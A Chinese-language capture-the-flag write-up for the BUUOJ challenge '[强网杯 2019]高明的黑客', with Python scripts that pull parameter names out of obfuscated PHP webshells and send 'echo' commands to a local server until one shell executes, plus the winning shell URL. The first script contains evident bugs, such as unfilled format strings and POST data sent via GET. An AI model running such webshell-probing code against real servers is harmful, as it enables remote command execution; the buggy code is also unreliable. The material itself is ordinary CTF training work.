高明的黑客

D盾扫一堆混淆+shell，不过没有几个是能用的，需要跑个脚本，考察脚本编写能力的，测试一下哪个是能用的。

上py

import os
import requests
# 文件路径
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# 遍历文件目录查找文件
files = os.listdir(path=path)


# GET方法传参
def GET(filename):
    f = open(path + filename, 'r')
    getList = []
    content = f.readlines()

    for line in content:
        if line.find("$_GET['") > 0:
            startIndex = line.find("$_GET['") + 7
            endIndex = line.find("'", startIndex)
            getList.append(line[startIndex:endIndex])
    return getList


# POST方法传参
def POST(filename):
    f = open(path + filename, 'r')
    postList = []
    content = f.readlines()

    for line in content:
        if line.find("$_POST['") > 0:
            startIndex = line.find("$_POST['") + 8
            endIndex = line.find("'", startIndex)
            postList.append(line[startIndex:endIndex])
    return postList


if __name__ == "__main__":
    for file in files:
        if file != ".idea":
            print("OPEN FILE:" + file)
            get = GET(file)
            for i in get:
                url = "http://127.0.0.1/%s?$s=%s".format(file, i, 'echo "GET SUCCESS"')
                response = requests.get(url=url)
                if response.text.find("GET SUCCESS") > 0:
                    print("SUCCESS GET! YOU FIND THE SHELL %s BY %s".format(file, i))
                    exit(0)

            post = POST(file)
            for i in post:
                url = "http://127.0.0.1/%s".format(file)
                data = {i: 'echo "POST SUCCESS"'}
                response = requests.get(url=url, data=data)
                if response.text.find("POST SUCCESS") > 0:
                    print("SUCCESS POST! YOU FIND THE SHELL %s BY %s".format(file, i))
                    exit(0)

        print("CLOSE FILE")

贼捞，大概一分钟跑七到八个这样子，算了算根本跑不完。

还是要多线程，最后参考大佬脚本搞的。

/xk0SzyKwfzw.php?Efa5BVG=echo%20%27success%27

import os
import requests
import threading
import time
import sys

# 文件路径
path = "D://SOURCE//BUUOJ//[强网杯 2019]高明的黑客//www.tar//www//src//"
# 遍历文件目录查找文件
files = os.listdir(path=path)


# GET方法传参
def GET(filename):
    f = open(path + filename, 'r')
    getList = []
    content = f.readlines()

    for line in content:
        if line.find("$_GET['") > 0:
            startIndex = line.find("$_GET['") + 7
            endIndex = line.find("'", startIndex)
            getList.append(line[startIndex:endIndex])
    return getList


# POST方法传参
def POST(filename):
    f = open(path + filename, 'r')
    postList = []
    content = f.readlines()

    for line in content:
        if line.find("$_POST['") > 0:
            startIndex = line.find("$_POST['") + 8
            endIndex = line.find("'", startIndex)
            postList.append(line[startIndex:endIndex])
    return postList


def get_content(file):
    print("OPEN FILE:" + file)
    get = GET(file)
    for i in get:
        url = "http://127.0.0.1/src/{}?{}={}".format(file, i, 'echo "GET '
                                                              'SUCCESS"')
        response = requests.get(url=url)
        if response.text.find("GET SUCCESS") > 0:
            print("SUCCESS GET! YOU FIND THE SHELL {} BY {}".format(file, i))
            f = open("shell.txt", "w")
            f.write(response.text)
            sys.exit(0)

    post = POST(file)
    for i in post:
        url = "http://127.0.0.1/src/{}".format(file)
        data = {i: 'echo "POST SUCCESS"'}
        response = requests.get(url=url, data=data)
        if response.text.find("POST SUCCESS") > 0:
            print("SUCCESS POST! YOU FIND THE SHELL {} BY {}".format(file, i))
            f = open("shell.txt", "w")
            f.write(response.text)
            sys.exit(0)
        response.close()

    print("CLOSE FILE")


if __name__ == "__main__":
    s1 = threading.Semaphore(100)
    requests.adapters.DEFAULT_RETRIES = 5
    for file in files:
        get_content(file)
        t = threading.Thread(target=get_content, args=(file,))
        t.start()